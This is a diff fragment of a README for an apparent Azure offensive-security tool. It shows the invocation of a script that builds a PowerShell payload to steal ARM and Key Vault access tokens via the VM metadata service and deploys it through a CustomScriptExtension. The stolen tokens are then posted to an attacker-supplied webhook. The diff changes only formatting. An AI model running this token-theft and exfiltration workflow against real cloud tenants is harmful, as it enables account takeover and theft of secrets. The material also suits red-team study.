rysaunders/azure-insecurity-tools/README.md

 python3 cse_min.py -g <resource-group> -n <vm-name> -w <webhook-url> --show
 ```

-This will:
+**This will:**
 1. Build the PowerShell payload to grab ARM + Key Vault access tokens via IMDS.
-	2. Encode it to UTF-16LE Base64 for -EncodedCommand execution.
+2. Encode it to UTF-16LE Base64 for `-EncodedCommand` execution.
-	3. Deploy it to the target VM via Azure CLI az vm extension set with CustomScriptExtension.
+3. Deploy it to the target VM via Azure CLI `az vm extension set` with `CustomScriptExtension`.
 4. POST results to the given webhook.

 ### 📦 az-vars.sh